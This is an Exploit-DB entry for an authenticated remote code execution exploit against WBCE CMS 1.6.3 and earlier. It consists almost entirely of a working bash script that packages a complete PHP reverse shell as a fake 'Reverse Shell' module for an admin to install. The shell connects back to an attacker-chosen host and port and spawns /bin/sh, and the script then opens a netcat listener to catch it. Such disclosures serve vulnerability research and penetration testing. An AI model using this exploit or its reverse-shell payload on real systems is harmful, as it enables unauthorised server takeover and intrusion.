WBCE CMS 1.6.3 - Authenticated Remote Code Execution (RCE)

EDB-ID:

52132

CVE:

N/A




Platform:

Multiple

Date:

2025-04-06


# Exploit Title: WBCE CMS <= v1.6.3 Authenticated Remote Code Execution (RCE)
# Date: 3/22/2025
# Exploit Author: Swammers8
# Vendor Homepage: https://wbce-cms.org/
# Software Link: https://github.com/WBCE/WBCE_CMS
# Version: 1.6.3 and prior
# Tested on: Ubuntu 24.04.2 LTS
# YouTube Demonstration: https://youtu.be/Dhg5gRe9Dzs?si=-WQoiWU1yqvYNz1e
# Github: https://github.com/Swammers8/WBCE-v1.6.3-Authenticated-RCE

#!/bin/bash

# Make a zip file exploit
# Start netcat listener

if [[ $# -ne 2 ]]; then
	echo "[*] Description:"
	echo "[*] This is an Authenticated RCE exploit for WBCE CMS version <= 1.6.3"
	echo "[*] It will create an infected module .zip file and start a netcat listener."
	echo "[*] Once the zip is created, you will have to login to the admin page"
	echo "[*] to upload and install the module, which will immediately run the shell"
	echo "[*] Shell taken from: https://github.com/pentestmonkey/php-reverse-shell/tree/master"
	echo "[!] Usage:"
	echo "[*] $0 <lhost> <lport>"
	exit 1
fi

if [ -z "$(which nc)" ]; then
	echo "[!] Netcat is not installed."
	exit 1 
fi

ip=$1
port=$2

rm -rf shellModule.zip
rm -rf shellModule
mkdir shellModule

echo [*] Crafting Payload

cat <<EOF > shellModule/info.php
<?php
/**
 *
 * @category        modules
 * @package         Reverse Shell
 * @author          Swammers8
 * @link                        https://swammers8.github.io/
 * @license         http://www.gnu.org/licenses/gpl.html
 * @platform        example.com
 * @requirements    PHP 5.6 and higher
 * @version         1.3.3.7
 * @lastmodified    May 22 2025
 *
 *
 */

\$module_directory               = 'modshell';
\$module_name                    = 'Reverse Shell';
\$module_function                = 'page';
\$module_version                 = '1.3.3.7';
\$module_platform                = '2.10.x';

\$module_author                  = 'Swammers8';
\$module_license                 = 'GNU General Public License';
\$module_description     = 'This module is a backdoor';

?>
EOF

cat <<EOF > shellModule/install.php
<?php
set_time_limit (0);
\$VERSION = "1.0";
\$ip = '$ip';  // CHANGE THIS
\$port = $port;       // CHANGE THIS
\$chunk_size = 1400;
\$write_a = null;
\$error_a = null;
\$shell = 'uname -a; w; id; /bin/sh -i';
\$daemon = 0;
\$debug = 0;

if (function_exists('pcntl_fork')) {
	\$pid = pcntl_fork();
	if (\$pid == -1) {
		printit("ERROR: Can't fork");
		exit(1);
	}
	
	if (\$pid) {
		exit(0);  // Parent exits
	}

	if (posix_setsid() == -1) {
		printit("Error: Can't setsid()");
		exit(1);
	}

	\$daemon = 1;
} else {
	printit("WARNING: Failed to daemonise.  This is quite common and not fatal.");
}

chdir("/");

umask(0);


\$sock = fsockopen(\$ip, \$port, \$errno, \$errstr, 30);
if (!\$sock) {
	printit("\$errstr (\$errno)");
	exit(1);
}

\$descriptorspec = array(
   0 => array("pipe", "r"),  // stdin is a pipe that the child will read from
   1 => array("pipe", "w"),  // stdout is a pipe that the child will write to
   2 => array("pipe", "w")   // stderr is a pipe that the child will write to
);

\$process = proc_open(\$shell, \$descriptorspec, \$pipes);

if (!is_resource(\$process)) {
	printit("ERROR: Can't spawn shell");
	exit(1);
}

stream_set_blocking(\$pipes[0], 0);
stream_set_blocking(\$pipes[1], 0);
stream_set_blocking(\$pipes[2], 0);
stream_set_blocking(\$sock, 0);

printit("Successfully opened reverse shell to \$ip:\$port");

while (1) {
	if (feof(\$sock)) {
		printit("ERROR: Shell connection terminated");
		break;
	}

	if (feof(\$pipes[1])) {
		printit("ERROR: Shell process terminated");
		break;
	}

	\$read_a = array(\$sock, \$pipes[1], \$pipes[2]);
	\$num_changed_sockets = stream_select(\$read_a, \$write_a, \$error_a, null);

	if (in_array(\$sock, \$read_a)) {
		if (\$debug) printit("SOCK READ");
		\$input = fread(\$sock, \$chunk_size);
		if (\$debug) printit("SOCK: \$input");
		fwrite(\$pipes[0], \$input);
	}

	if (in_array(\$pipes[1], \$read_a)) {
		if (\$debug) printit("STDOUT READ");
		\$input = fread(\$pipes[1], \$chunk_size);
		if (\$debug) printit("STDOUT: \$input");
		fwrite(\$sock, \$input);
	}

	if (in_array(\$pipes[2], \$read_a)) {
		if (\$debug) printit("STDERR READ");
		\$input = fread(\$pipes[2], \$chunk_size);
		if (\$debug) printit("STDERR: \$input");
		fwrite(\$sock, \$input);
	}
}

fclose(\$sock);
fclose(\$pipes[0]);
fclose(\$pipes[1]);
fclose(\$pipes[2]);
proc_close(\$process);

function printit (\$string) {
	if (!\$daemon) {
		print "\$string\n";
	}
}

?> 
EOF

echo [*] Zipping to shellModule.zip
zip -r shellModule.zip shellModule
rm -rf shellModule
echo [*] Please login to the WBCE admin panel to upload and install the module
echo [*] Starting listener

nc -lvnp $port

echo
echo
echo "[*] Done!"
echo "[*] Make sure to uninstall the module named 'Reverse Shell' in the module page"